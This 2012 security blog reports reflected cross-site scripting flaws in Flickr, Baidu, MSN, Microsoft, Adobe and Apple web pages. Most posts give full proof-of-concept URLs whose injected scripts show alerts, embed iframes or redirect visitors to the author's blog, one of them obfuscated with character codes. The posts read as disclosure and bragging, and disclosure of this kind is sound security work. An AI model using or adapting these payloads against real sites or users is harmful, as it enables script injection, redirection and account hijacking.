
Blog

28 March 2012

XSS in flickr.com

Several days ago, I found a trivial cross-site scripting vulnerability in flickr.com.

The vulnerability was fixed within an hour of the initial report. Thanks to Joshua Cohen (@heyjoshua).

Some screenshots:



21 March 2012

Cross-site scripting flaws in Baidu and MSN

Sony st2tea.blogspot.com


...in baidu.com

https://passport.baidu.com/v2/?reg&tpl='"></script><script>alert(String.fromCharCode(88,83,83,32,98,121,32,102,108,101,120,120,112,111,105,110,116,32,38,32,83,111,110,121));location=(String.fromCharCode(104,116,116,112,58,47,47,115,116,50,116,101,97,46,98,108,111,103,115,112,111,116,46,99,111,109))</script>

...in .msn 


http://fitbie.msn.com/get-fit/videos/?vid="></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com width=900 height=800 >


http://sport.be.msn.com/running/nl/nieuws/article.html?Article_ID='-->"></script><script>alert('XSS by flexxpoint and Sony')</script><iframe/src=//st2tea.blogspot.com height=800 width=850>&utm_source=msn-sportsbox-nl&utm_campaign=sportbe_rss&utm_medium=rss


http://topics.msn.com.tw/fashion/SearchResult.aspx?d=2"/><script>alert('XSS by flexxpoint and Sony')</script>


...simple 

20 March 2012

I just grabbed this from Sony's blog... (:

Monday, 19 March 2012
Microsoft.com Cross Site Scripting
# Date: 19.03.2012
# Author: Sony and Flexxpoint
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
..................................................................

For Ryuzaki Lawlet:

http://packetstormsecurity.org/files/110597/Microsoft.com-Cross-Site-Scripting.html

Demo:

http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=%22%22%3E%3Cscript%3Ealert%28%22XSS%20by%20Sony%20and%20Flexxpoint%22%29%3C/script%3E%3Cscript%3Ealert%28%22Oh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Uh..%22%29%3C/script%3E%3Cscript%3Ealert%28%22wow..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Microsoft.com%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Cscript%3Ealert%28%22meow!%22%29%3C/script%3E%3Ciframe%20width=%22420%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/SLcBI3JUKZ4%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E










17 March 2012

Cross-site scripting vulnerabilities in Microsoft, Adobe, Apple and Symantec web sites

Cross-site scripting vulnerability in microsoft.com





Bad fix from Microsoft: the page was XSSed for the first time on 07.03.2012 (mirror) and is still vulnerable today...

PoC:

http://www.microsoft.com/en-us/together/possibilities.aspx?a='"--></style><script>confirm(/BAD FIX!/.source);/&b=*/</script>

Cross-site scripting vulnerability in adobe.com




PoC:


https://www.adobe.com/cfusion/store/html/index.cfm?store=OLS-US&event=searchFonts&type="><img src=x: onerror=alert(String.fromCharCode(74,117,115,116,32,97,32,88,83,83,46,46,46))>&code=blackletter&cat=style

Cross-site scripting vulnerability in support.apple.com




PoC:


http://support.apple.com/kb/index?page=servicefaq&geo='-alert('xss')-'&product=ipad

